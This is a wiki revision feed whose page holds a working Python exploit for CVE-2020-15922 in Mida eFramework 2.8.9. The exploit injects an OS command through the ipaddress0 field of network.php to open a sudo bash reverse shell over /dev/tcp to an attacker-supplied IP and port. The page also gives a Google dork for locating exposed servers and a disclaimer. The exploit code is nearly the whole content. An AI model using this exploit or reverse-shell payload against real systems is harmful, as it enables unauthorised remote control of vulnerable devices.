https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-15922_Mida_eFramework_2.8.9_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fru CVE-2020-15922 Mida eFramework 2.8.9 遠程代碼執行漏洞/ru - Revision history 2026-04-03T20:36:33Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2020-15922_Mida_eFramework_2.8.9_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ru&diff=5144&oldid=prev Pwnwiki: Created page with "CVE-2020-15922 Mida eFramework 2.8.9 уязвимость удаленного выполнения кода" 2021-06-16T02:00:25Z <p>Created page with &quot;CVE-2020-15922 Mida eFramework 2.8.9 уязвимость удаленного выполнения кода&quot;</p> <p><b>New page</b></p><div>&lt;languages /&gt;<br /> ==Затронутая версия==<br /> &lt;pre&gt;<br /> Version: &lt;= 2.8.9<br /> &lt;/pre&gt;<br /> <br /> ==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Mida eFramework 2.8.9 - Remote Code Execution<br /> # Google Dork: Server: Mida eFramework<br /> # Date: 2020-08-27<br /> # Exploit Author: elbae<br /> # Vendor Homepage: https://www.midasolutions.com/<br /> # Software Link: http://ova-efw.midasolutions.com/<br /> # Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html<br /> # Version: &lt;= 2.8.9<br /> # CVE : CVE-2020-15922<br /> <br /> <br /> #! /usr/bin/python3<br /> # -*- coding: utf-8 -*-<br /> <br /> import argparse<br /> import base64<br /> import random<br /> import requests<br /> import subprocess<br /> from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /> requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br /> <br /> def print_disclaimer():<br /> print(&quot;&quot;&quot;<br /> ---------------------<br /> Disclaimer:<br /> 1) For testing purpose only.<br /> 2) Do not attack production environments.<br /> 3) Intended for educational purposes only and cannot be used for law<br /> violation or personal gain.<br /> 4) The author is not responsible for any possible harm caused by this<br /> material.<br /> ---------------------&quot;&quot;&quot;)<br /> <br /> <br /> def print_info():<br /> print(&quot;&quot;&quot;<br /> [*] PoC exploit for Mida eFramework 2.8.9 PDC (CVE-2020-15922)<br /> [*] Reference:https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html<br /> [*] Vulnerability: OS Command Injection RCE in PDC/pages/network.php -<br /> Reverse Shell<br /> ./CVE-2020-15922 http://192.168.1.60:8090/PDC/pages/network.php rev-IP<br /> rev-PORT &quot;&quot;&quot;)<br /> <br /> def run_cmd(url,ip,port):<br /> rev_shell = &quot;sudo bash -i &gt;&amp; /dev/tcp/{0}/{1} 0&gt;&amp;1&quot;.format(ip,port)<br /> print(&quot;[+] Reverse shell: {0}&quot;.format(rev_shell))<br /> data = {<br /> &quot;submit&quot;:&quot;True&quot;,<br /> &quot;ipaddress0&quot;:&quot;; {0}&quot;.format(rev_shell),<br /> &quot;netmask0&quot;:&quot;&quot;,<br /> &quot;gateway0&quot;:&quot;&quot;,<br /> &quot;dns1&quot;:&quot;&quot;,<br /> &quot;dns2&quot;:&quot;&quot;<br /> }<br /> # exec rev shell<br /> print(&quot;[*] Starting reverse shell to {0} {1}...&quot;.format(ip,port))<br /> try:<br /> r = requests.post(url,data=data,verify=False,timeout=1)<br /> except requests.exceptions.ReadTimeout:<br /> print(&quot;[?] ...check if it worked&quot;)<br /> pass<br /> <br /> def main():<br /> print_info()<br /> print_disclaimer()<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument(&quot;target&quot;, type=str,<br /> help=&quot;the complete target URL&quot;)<br /> parser.add_argument(&quot;ip&quot;, type=str,<br /> help=&quot;the ip address for reverse shell&quot;)<br /> parser.add_argument(&quot;port&quot;, type=str,<br /> help=&quot;the port for reverse shell&quot;)<br /> args = parser.parse_args()<br /> run_cmd(args.target, args.ip, args.port)<br /> <br /> if __name__ == '__main__':<br /> main()<br /> &lt;/pre&gt;</div> Pwnwiki